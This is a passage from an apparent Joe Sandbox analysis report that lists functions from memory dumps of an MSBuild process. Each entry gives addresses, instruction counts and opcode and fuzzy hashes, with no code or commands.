                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f867601911b6f917c8a7b20df495b61d0aefdae42866b75b1750957b19fc8f3
                                                • Instruction ID: 4c3b06fe1abe864de3e877590c724366a7bff247956c100c7b639226ea52166d
                                                • Opcode Fuzzy Hash: 7f867601911b6f917c8a7b20df495b61d0aefdae42866b75b1750957b19fc8f3
                                                • Instruction Fuzzy Hash: 8F51D730B612189FEF64666CDAA472F365AD789710F20482AE40ED77D8CE79CC855392
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E54C0 Relevance: .1, Instructions: 126COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6877deccdb77c8db2d6b8b17e1e6aad342567f99a55c129b27253147872d8e54
                                                • Instruction ID: cb63a153387d3bfb93124d846a62eedd38946e04d9eb98ea2f8ff798dacc7d8e
                                                • Opcode Fuzzy Hash: 6877deccdb77c8db2d6b8b17e1e6aad342567f99a55c129b27253147872d8e54
                                                • Instruction Fuzzy Hash: 8F414C71E006098FDF70CFAAD880AAFFBB2FB94314F20492AD116D7654D731E8598B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EDA18 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7ac8516101ba06fdc6f779ae03a337b61a8c810a2e4aca5fbafdcb8b049490c
                                                • Instruction ID: 7504219bc4a53e3fbd152521152ae0d5fdcf4665553332ac522538d8fbbdb1a9
                                                • Opcode Fuzzy Hash: e7ac8516101ba06fdc6f779ae03a337b61a8c810a2e4aca5fbafdcb8b049490c
                                                • Instruction Fuzzy Hash: E331A330E1061A9FCF25DF69C59469EBBB2FF85304F148929E405EB354EBB0E9478B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E2140 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad08aaa4528badc61ba3b4a511928302e9ba83983ab607ebd3e8b8a29cfcd6da
                                                • Instruction ID: 8ea6c6d5b2de249cf3ec527b466f3f743bdd0c00c92031baee86460a3a56947e
                                                • Opcode Fuzzy Hash: ad08aaa4528badc61ba3b4a511928302e9ba83983ab607ebd3e8b8a29cfcd6da
                                                • Instruction Fuzzy Hash: 61316031E102099BCF15CFA5D8A569EB7BABF89300F108529E906A7350DB71E946CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E2150 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd47940a7812cdce8bed7a58c7508cb1bd60d1cf0094c74abc43b32c5b7dd50a
                                                • Instruction ID: 95246a64aa5f6e7b98cc2472f2ecdede613c17533d73a113ed20f01729624e63
                                                • Opcode Fuzzy Hash: cd47940a7812cdce8bed7a58c7508cb1bd60d1cf0094c74abc43b32c5b7dd50a
                                                • Instruction Fuzzy Hash: 4E315030E102099FCF55CFA5D8A569EB7BABF89300F108529E906E7354DB71ED46CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3B49 Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b20ab2f991a9a5a6e72b01a5199d4884e891fcdf1e82f6036a6a7bc559db800
                                                • Instruction ID: 92424d635dd26b5741291ed59fb76a89c7858833fd1e97658499ce02277426c3
                                                • Opcode Fuzzy Hash: 6b20ab2f991a9a5a6e72b01a5199d4884e891fcdf1e82f6036a6a7bc559db800
                                                • Instruction Fuzzy Hash: A6218B75F012269FDB50CF69D880AAEBBF5EB48700F108529E905F7390E734ED458B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3B58 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3dd7dd4beb17273322e910dfcc560fd7411a567dcb899a51141cea7e3e9f252
                                                • Instruction ID: 8f0c6bf0273082a5f7c354ab5ace95acdc02c2cad7ccd488e1c5bd509f05a317
                                                • Opcode Fuzzy Hash: a3dd7dd4beb17273322e910dfcc560fd7411a567dcb899a51141cea7e3e9f252
                                                • Instruction Fuzzy Hash: C421AC75F016259FDB50CF68D880AAEBBF5EB48700F108529E905F7390E738ED068B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 014ED030 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3007803323.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_14ed000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7395804485055e9ceccb32d1aee57e7ecc472a1ea7c8714ca5b34d84d494258
                                                • Instruction ID: 67b61bffb25bef84ff1737e0f25b0e88a4265c02fc2e8a32a1f02768c88db150
                                                • Opcode Fuzzy Hash: e7395804485055e9ceccb32d1aee57e7ecc472a1ea7c8714ca5b34d84d494258
                                                • Instruction Fuzzy Hash: F82125B1904200DFCB15DF58D988B26BFA5EB84318F28C56ED80A4B3A6C336D447CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 014ED006 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3007803323.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_14ed000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 344bc97cc416dda069995d4c09f88402fae0c140072ae4d663b63367060591dc
                                                • Instruction ID: 9d51ef1ad97c2f3bb7a428b7367e84d38dcbf22ee7dc78d8410561cbfb8abc8b
                                                • Opcode Fuzzy Hash: 344bc97cc416dda069995d4c09f88402fae0c140072ae4d663b63367060591dc
                                                • Instruction Fuzzy Hash: D1216D755093C08FDB07CF64C994715BF71AF46214F29C5EBD8898F2A3C23A980ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3108 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 19784c4d10501a6bd045ac7b58ef9ba8c78a8c84f3f8d1c86827d9f42a59333f
                                                • Instruction ID: 642f1a45868de2459d3878728d63c1fd903f558a61ebe66bf6d8ebc8a3c21340
                                                • Opcode Fuzzy Hash: 19784c4d10501a6bd045ac7b58ef9ba8c78a8c84f3f8d1c86827d9f42a59333f
                                                • Instruction Fuzzy Hash: 0B118171E012185BCF58DBA9D8505DEB7B5EB89310F10857ED009FB344EA31D945CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3C68 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44208f256f5451ccc01f0b2d8f1d71a44aaf32c93cedd0ebbf4fb8b8f84b0034
                                                • Instruction ID: 09148212087fd8ff7b165b0bd8a19f17dabfc809089e6f768db158f9a053e5a4
                                                • Opcode Fuzzy Hash: 44208f256f5451ccc01f0b2d8f1d71a44aaf32c93cedd0ebbf4fb8b8f84b0034
                                                • Instruction Fuzzy Hash: B211A135B101289FDF549A68CC14AAE73EAEBC8711B10443AD40AF7344EE24EC078BD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3EA0 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f9fe6ac3ef56b628906c4eb87fb25a8ea4adfadcee6a46d58c90491c682fc71
                                                • Instruction ID: 35f9b3a4e2e51007cb8b5e2e3616dde8f722f0182563da743f38c857d2cee8ff
                                                • Opcode Fuzzy Hash: 0f9fe6ac3ef56b628906c4eb87fb25a8ea4adfadcee6a46d58c90491c682fc71
                                                • Instruction Fuzzy Hash: D201F531B101511FCB25967DD45176BBBFACBCA714F24847AE50EC7391DA25DC038392
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E54B1 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c0a761b551517be728cc2b7ea9e3b09280d0e67bf588168751a46faf087e00b8
                                                • Instruction ID: 9deb68929368528c70ce5a514e12e6161c7d6dbb9a8722a792bdad1c70bff4d5
                                                • Opcode Fuzzy Hash: c0a761b551517be728cc2b7ea9e3b09280d0e67bf588168751a46faf087e00b8
                                                • Instruction Fuzzy Hash: B2119D71A007058FCB20CFAADD809AFFFB3FB84304F14892AD11697654D771A8198B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EEE2F Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2900d484025f9beeb402b515749d1bbc733c211246ef9c701017a65f3f28f8f5
                                                • Instruction ID: b2fd0f4bd1b356315b8c6e334028b52345e2a7f8be68c904535e6dec20cafc73
                                                • Opcode Fuzzy Hash: 2900d484025f9beeb402b515749d1bbc733c211246ef9c701017a65f3f28f8f5
                                                • Instruction Fuzzy Hash: 9D01DF31B105125FCB619A2DD895B6F67DADBCA610F10843AF10AC7380EE26DC434392
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3920 Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4fb4eacf71d02d702dc39f58a322b5324fa1dc7e7e0ef0363ad2f2e7e89056be
                                                • Instruction ID: 7d813f1fcb37c05bbb92ee69df32ab8c226c1337599212682ae88d9559c42079
                                                • Opcode Fuzzy Hash: 4fb4eacf71d02d702dc39f58a322b5324fa1dc7e7e0ef0363ad2f2e7e89056be
                                                • Instruction Fuzzy Hash: 3921C0B5D01259AFCB00CF9AD885ADEFBB4FB49314F10852AE958B7340D374A544CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3928 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 55de31cb3b32389059733c4fb4eef026a1ce12c684b75190ac93c7df2a9442a0
                                                • Instruction ID: cfcb68cebeba167a850811ab026172849409f7defbbaa42590ba02404dfeb0a4
                                                • Opcode Fuzzy Hash: 55de31cb3b32389059733c4fb4eef026a1ce12c684b75190ac93c7df2a9442a0
                                                • Instruction Fuzzy Hash: 4D11B0B5D01259AFCB00DF9AD884ADEFBB4FB49324F10812AE918B7340D374A954CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3EB0 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7e9edfcd43d123197959a6ce53832880dd39e8a8ba1cf4aa61a4638a0ce98189
                                                • Instruction ID: 90886647f7596646150cfd82eb494f96b6ec6549f97228897a2d70a6fcb969bb
                                                • Opcode Fuzzy Hash: 7e9edfcd43d123197959a6ce53832880dd39e8a8ba1cf4aa61a4638a0ce98189
                                                • Instruction Fuzzy Hash: 5901DC31B104111BDB649A6EE455B2FB7EACBCA710F20843AF50EC7394EE26DC038386
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E3C5A Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e5c3441c9d05ce066e62fe7651356760ed9a565b133973c0deb186089ce3f3d
                                                • Instruction ID: 5a6be9038c23846e88e6a5051d0dba22d3adaaa50d1ebe28eafbcb945c784b57
                                                • Opcode Fuzzy Hash: 5e5c3441c9d05ce066e62fe7651356760ed9a565b133973c0deb186089ce3f3d
                                                • Instruction Fuzzy Hash: AC01B132B100655BEB949A68CC106AF73EAEBC4604B10443ED40AF7340EE24D9478BD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EEE40 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a112d3490fbbafcc5cfacc78401aefd544d802310d6ca78448a3b97bf072e15b
                                                • Instruction ID: 37d87df65ac95da4a6b7062a9e80a136810b59f9b889b68d1480de5c7f790d27
                                                • Opcode Fuzzy Hash: a112d3490fbbafcc5cfacc78401aefd544d802310d6ca78448a3b97bf072e15b
                                                • Instruction Fuzzy Hash: 2D01A431B109111BCB75966DD45573F73DADBCA610F14843AE10EC7344EE22DC034385
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EA3AA Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c23f0658eb7df93bdb0bf9787a50a2908cfe02e37f0cf2bcea34409c6f32b102
                                                • Instruction ID: 5a7dfbab358353bd9832738b8df95edf31c793044583cb70dad7749bbfd19426
                                                • Opcode Fuzzy Hash: c23f0658eb7df93bdb0bf9787a50a2908cfe02e37f0cf2bcea34409c6f32b102
                                                • Instruction Fuzzy Hash: A001A771B210119FDB60DA79E99576E77D6EB8A714F10883EE00EC7350EE35DC028381
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EA3B8 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ccb8c5d321a8a5dfaf5d6c5d19dab55e409abee52a73d8a6da4d019479149f7e
                                                • Instruction ID: 9e0cf5b5d4d37458ddcd99e70f3d7b21c12dd5ca8ce7971ad97ed6fe70b9298a
                                                • Opcode Fuzzy Hash: ccb8c5d321a8a5dfaf5d6c5d19dab55e409abee52a73d8a6da4d019479149f7e
                                                • Instruction Fuzzy Hash: 1701A430B210219FDB60DABDE89572EB7E9EB8A710F108439E50EC7350EE25EC024381
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EC880 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d4169ebafb7a93f6eb2961c5600990397202ce489486448a001ba2434f9ae31
                                                • Instruction ID: 5a72c384b696b0d8e5688e93a4f653de99c763e5b9009ed387957d8d7291420f
                                                • Opcode Fuzzy Hash: 0d4169ebafb7a93f6eb2961c5600990397202ce489486448a001ba2434f9ae31
                                                • Instruction Fuzzy Hash: D2012831F61228ABCF14EA69E951ADEB776F785310F104539E911EB344DB32AC0487C0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E6510 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d03fadd20fe7fb86967183b275bb10cd9c293a7ef06e0a0779593354413d7d1e
                                                • Instruction ID: be61bca120f0f4caf354c607db6aec692b5f640d58263f405c5364c180ff3901
                                                • Opcode Fuzzy Hash: d03fadd20fe7fb86967183b275bb10cd9c293a7ef06e0a0779593354413d7d1e
                                                • Instruction Fuzzy Hash: 85E0D831E11109ABDF60CEA4C946B4AF7ECEB41214F304CAAD804DB341E27ADA418740
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E6520 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b18360c445daeed6c0431c8d2255b4635347293db7de6383a2d9fac2eca7d1b
                                                • Instruction ID: 92e89ce6c97b65ef26358eedbe544a924fe1ab8c00e86d36a65063bee49ab864
                                                • Opcode Fuzzy Hash: 5b18360c445daeed6c0431c8d2255b4635347293db7de6383a2d9fac2eca7d1b
                                                • Instruction Fuzzy Hash: 31E0C271F12108ABDF90DEB0C94575E77ACDB01208F2084A4D409C7306E572CA024780
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 066E7740 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2222239885
                                                • Opcode ID: 8cc91a3e4b9a04b7a742cf9c826a12be5235543aa9d400d415242d1112b7ddef
                                                • Instruction ID: f66538189456cd26052ce5af43156b675d3fbd9be5fc803398b7238a5760974b
                                                • Opcode Fuzzy Hash: 8cc91a3e4b9a04b7a742cf9c826a12be5235543aa9d400d415242d1112b7ddef
                                                • Instruction Fuzzy Hash: 71122C34E01619CFDB68DF65C954AAEBBB2FF84700F2085A9D409AB354DB309D86CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EE450 Relevance: 4.3, Strings: 3, Instructions: 572COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0oAp$DqAp$PH^q
                                                • API String ID: 0-3365528505
                                                • Opcode ID: f1eee9e5d6f69bbb266c02b5cb816bd666847813791d4f68f375d7db620b60d9
                                                • Instruction ID: 87c87cd80f5585984ec71e9bbf82d0c2f46e23f56cb241c46d98cbcd30942079
                                                • Opcode Fuzzy Hash: f1eee9e5d6f69bbb266c02b5cb816bd666847813791d4f68f375d7db620b60d9
                                                • Instruction Fuzzy Hash: 9D22B130B111058FCB54DB68D594AAEB7F2FF89310F24856AD40ADB3A5DB32EC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E5D98 Relevance: 2.9, Strings: 2, Instructions: 409COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XPcq$\Ocq
                                                • API String ID: 0-2802517751
                                                • Opcode ID: 59e0dfb6227ed5ca56db698e5a5f5adfd31a8e4a972393517b72dbbddf8cbf40
                                                • Instruction ID: ed047404dc78ac9194c06a6f4a6e856cdf6417dcf5aa550e5cffbb68387f7cf5
                                                • Opcode Fuzzy Hash: 59e0dfb6227ed5ca56db698e5a5f5adfd31a8e4a972393517b72dbbddf8cbf40
                                                • Instruction Fuzzy Hash: 8AD1E131B111148FDF64DB69C594AAEBBF2FF99314F20846AE446DB3A1CA32DC41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066E0040 Relevance: 2.0, Instructions: 1977COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09c2e15110a8e7ee5e4ef1681d0d4fe08f2c68a6e77b1fe64a63481ae82f83f0
                                                • Instruction ID: a30242b3cbb56b54afd8dc19641db199a705a1413be52090a1c0b5cf62234f47
                                                • Opcode Fuzzy Hash: 09c2e15110a8e7ee5e4ef1681d0d4fe08f2c68a6e77b1fe64a63481ae82f83f0
                                                • Instruction Fuzzy Hash: 8A230B31D10B198ACB11EF68C89069DF7B1FF99300F15D69AE458B7221EB70AAD5CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02DD41F0 Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3008297970.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2dd0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9903253ea905e7316798600498a5b901d8e683ccedb7bf5d0a02054901db9415
                                                • Instruction ID: aa5dcf117a1422d1f25afc6478092777b586a24b404b72b519a9782e2a40819d
                                                • Opcode Fuzzy Hash: 9903253ea905e7316798600498a5b901d8e683ccedb7bf5d0a02054901db9415
                                                • Instruction Fuzzy Hash: 70B12B70E006098FDF14CFA9D9857AEBBF2AF88314F148129D859A7394EB749885CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0667AE5C Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013175201.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6670000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 90681e6fe3f3242aea37e8a95f89e11bdfc102b2fdc6ba2bbbfd6195807892f6
                                                • Instruction ID: e6c315a83c19c007ab9674b3553f2f593207dda3e77356ce7877128f780a9e14
                                                • Opcode Fuzzy Hash: 90681e6fe3f3242aea37e8a95f89e11bdfc102b2fdc6ba2bbbfd6195807892f6
                                                • Instruction Fuzzy Hash: FBA1A132E1020ADFCF45DFB5C8405AEBBB2FF85300F15466AE911AB261DB31E956CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 066EA9D8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3013751992.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_66e0000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-3823777903
                                                • Opcode ID: 4c9e2b8093ebdc5c6f67bab5600319e12aa640ca2277a63605ac75cf6e41003c
                                                • Instruction ID: 617b443a7e692f8964095065d840368aff3280c410108012374119a58f6b7d9b
                                                • Opcode Fuzzy Hash: 4c9e2b8093ebdc5c6f67bab5600319e12aa640ca2277a63605ac75cf6e41003c
